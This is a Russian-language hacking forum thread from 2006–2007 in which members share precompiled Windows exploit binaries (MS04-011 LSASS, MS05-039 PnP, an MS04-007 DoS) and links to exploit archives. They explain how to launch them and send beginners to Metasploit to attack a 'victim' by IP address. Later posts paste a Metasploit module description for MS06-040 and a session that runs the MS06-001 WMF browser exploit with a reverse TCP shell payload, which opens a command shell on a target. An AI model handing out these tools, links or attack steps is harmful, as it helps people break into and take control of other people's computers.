Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Exploit для Windows.exe (https://forum.antichat.xyz/showthread.php?t=24462)

KPOT_f!nd 26.09.2006 04:33

Exploit для Windows
 
Челы античата вот открыл раздел Exploit для Windows.exe. Для тех кто не может компилить сплойты для Windows, или у кого не компилиться или нет компилятора! Здесь будут выложенны бинарники(готовые) сплойты. Но есть одно НО кто хочит выкладавать бинарники то прошу всех выкладавать ЧИСТАМИ, без троянов и backdoorov!

Буду сам проверять и отписываться!

Вот качаем архив со сплойтами для Win

windows
В архиве содержится сплойты:

HOD-ms04011-lsasrv-expl.exe
HOD-ms05039-pnp-expl.exe
MS04-007-dos.exe
ms04011lsass.exe

На них документацию можно найти на securitylab.ru
Почитать про первый сплойт можно здесь
HOD -ms04011-lsasrv-expl.
А дальше юзай СЕКЛАБ! Сплойты проверены мной лично антивири кричат говорят что это Exploit.Win32.CAN.2003-0533!

KPOT_f!nd 26.09.2006 04:40

Цитата:

Сплойты проверены мной лично антивири кричат говорят что это Exploit.Win32.CAN.2003-0533!
Чисты без троев! А кричит он на то что это эксплойт! Любой антивирь будет посылать вас говоря что это сплойт! Однаждый я качнул тоже бинарник(шелла не было под рукой для компиляций) антирирь крикнул что там троян!

A110ut 26.09.2006 05:27

тема конечно полезная, держи +, но "Windows.exe" и "backdoorov" убило))

podkashey 26.09.2006 12:45

ИМХО, если уж выкладывать такие вещи, то в формате: название = краткое описание (хотя бы локальный или ремоут) = ссылка на полное описание и сурс.
А то так смысл темы немного потеряется. Будут люди просто скидывать типа: ZloSend.exe и ищи его описание....
P.S. Ну и само собой подправить первый пост для этого и потереть остальные. ;)

SanyaX 26.09.2006 12:55

Цитата:

раздел Exploit
Только администраторы имееют прво создавать новые разделы. А это будет просто тема.

SK | Heaton 26.09.2006 13:27

2A110ut ни говори +))

em00s7 26.09.2006 13:35

lol... это старо как win 98
бинарники бугогго

blackybr 26.09.2006 19:25

Цитата:

Exploit для Windows.exe
жестокий ты )))

Цитата:

HOD-ms04011-lsasrv-expl.exe
HOD-ms05039-pnp-expl.exe
MS04-007-dos.exe
ms04011lsass.exe
блин. это сплоиты 2003-2004 года.. не вобиду.. но абсолютно бесполезный топ.

KPOT_f!nd 27.09.2006 01:11

Цитата:

блин. это сплоиты 2003-2004 года.. не вобиду.. но абсолютно бесполезный топ.
Да это верно! Но не у всех юзеров есть под рукой рабочий компилятор или shell! Пусть они старые зато пашут! ВСЕХ ПРОШУ ПРИНЯТЬ УЧАСТИЕ! Выложите сплойты для винды в бинарном виде, или точнее поделитесь ими

cardons 27.09.2006 12:54

Цитата:

Сообщение от podkashey
ИМХО, если уж выкладывать такие вещи, то в формате: название = краткое описание (хотя бы локальный или ремоут) = ссылка на полное описание и сурс.
А то так смысл темы немного потеряется. Будут люди просто скидывать типа: ZloSend.exe и ищи его описание....
P.S. Ну и само собой подправить первый пост для этого и потереть остальные. ;)

А че там описывать берешь жмешь Пуск дальше жмешь выполнить вводишь cmd и потом к примеру если сплоит лежит на C диске то к примеру там потом пишем C:\HOD-ms04011-lsasrv-expl.exe а дальше он тебе сам покажет пример как делать

cardons 27.09.2006 12:55

Цитата:

Сообщение от KPOT_f!nd
Да это верно! Но не у всех юзеров есть под рукой рабочий компилятор или shell! Пусть они старые зато пашут! ВСЕХ ПРОШУ ПРИНЯТЬ УЧАСТИЕ! Выложите сплойты для винды в бинарном виде, или точнее поделитесь ими

Да по моему нету смысла что они пашут все равно мало кто пользуеться к примеру Win2000 Sp4

cardons 27.09.2006 14:52

Вот к примеру архив с такими сплоитами
http://www.web-hack.ru/download/download.php?go=81

Angel_MakKedo 25.01.2007 21:14

ЛЮДИ ! Помогите найти описание или как запустить такие эксплоиты как:
MS05-002
MS05-011
MS05-012
MS05-030
MS05-036
MS05-037
MS05-038
MS05-039
MS05-047
MS05-051
MS05-054
MS06-001
MS06-005
MS06-007
MS06-012
Всё это бездвоздмездно(тоесть даром лежит по адресу :) http://type.nm.ru/exp.htm )
За совет по делу скажу СПОСИБО! :)

karabym 25.01.2007 21:52

А проект http://metasploit.com собственно для чего делали ?! ....

Angel_MakKedo 26.01.2007 00:16

Огромное Спосибо ! Попробую розобратся........
....надо буржуйский язык учить :)

Angel_MakKedo 26.01.2007 00:55

Цитата:

Сообщение от karabym
А проект http://metasploit.com собственно для чего делали ?! ....

ИзвИНИ за глупый вопрос а рускоязычных проэктов нет ?

big_BRAT 26.01.2007 01:12

Впринцепе руский и не нужен для работы с метасплоитом... Он начала "атаки" и "шела" максимум 4 клика мыши и нужно ввести ИП "жертвы"

karabym 26.01.2007 01:23

Цитата:

ИзвИНИ за глупый вопрос а рускоязычных проэктов нет ?
Вот качай мануал не большой

-=lebed=- 26.01.2007 01:41

Цитата:

Сообщение от karabym

ГЫ! А, что просто ссылку античатовскую не судьба дать на мою статью? :D
to Angel_MakKedo - все ссылки на статьи по Метасплоиту, на русском, найдёшь у меня в подписи...

karabym 26.01.2007 01:47

Цитата:

ГЫ! А, что просто ссылку античатовскую не судьба дать на мою статью?
to Angel_MakKedo - все ссылки на статьи по Метасплоиту, на русском, найдёшь у меня в подпи
Да я фиг знает где че :))) лень сильная штука :)

-=lebed=- 26.01.2007 01:53

Цитата:

Сообщение от karabym
Да я фиг знает где че :))) лень сильная штука :)

Поиск рулит:
http://forum.antichat.ru/search.php?searchid=655706

оффтоп: Один лентяй другому помагает... :D

karabym 26.01.2007 01:57

Цитата:

Один лентяй другому помагает...
отжег :D так второй вобще получается тунеядец :D

Angel_MakKedo 29.01.2007 23:12

Большо спасибо кому не в лом черкнуть пару строк :)
Понял как подключить пациэнта на ms04-011 в Metasploit!
Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?

-=lebed=- 30.01.2007 00:16

Цитата:

Сообщение от Angel_MakKedo
Большо спасибо кому не в лом черкнуть пару строк :)
Понял как подключить пациэнта на ms04-011 в Metasploit!
Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?

ИМХО нет, но и его пробиваемость низка на новых системах:
Цитата:

Уязвимость Server Message Block (MS05-027) хотя и может позволить злоумышленнику проникнуть в ПК, атакующий должен пройти аутентификацию в системе. Эта уязвимость проявляется в Windows XP Service Packs 1 и 2, Windows 2000 Service Packs 3 и 4 и других версиях Windows
тогда уж юзай этот:
Цитата:

msf exploit(ms06_040_netapi) > info

Name: Microsoft Server Service NetpwPathCanonicalize Overflow
Version: 3720
Platform: Windows
Privileged: Yes
License: Metasploit Framework License v1.0

Provided by:
hdm <hdm@metasploit.com>

Available targets:
Id Name
-- ----
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
1 (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
2 (wcscpy) Windows XP SP0/SP1
3 (stack) Windows XP SP1 English
4 (stack) Windows XP SP1 Italian

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no proxy chain
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBDOM WORKGROUP no The Windows domain to use for authentication
SMBDirect True yes The target port is a raw SMB service (not NetBIOS)
SMBNAME *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SMBPASS no The password for the specified username
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
SMBUSER no The username to authenticate as
SSL no Use SSL

Payload information:
Space: 370
Avoid: 7 characters

Description:
This module exploits a stack overflow in the NetApi32
CanonicalizePathName() function using the NetpwPathCanonicalize RPC
call in the Server Service. It is likely that other RPC calls could
be used to exploit this service. This exploit will result in a
denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed
exploit attempt will likely result in a complete reboot on Windows
2000 and the termination of all SMB-related services on Windows XP.
The default target for this exploit should succeed on Windows NT
4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.

References:
http://www.securityfocus.com/bid/19409
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3439
http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx

msf exploit(ms06_040_netapi) >
P.S. Ксати ББ ms05-027 ИМХО уже заменён на ms06-035

ZaCo 30.01.2007 00:55

only true hэcker can compile zero sploent.

Angel_MakKedo 01.02.2007 21:49

quote:


msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
# Started reverse handler
# Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
# Server started.
# Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs
# Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd
msf exploit(ms06_001_wmf_setabortproc) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc


Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?


Время: 21:47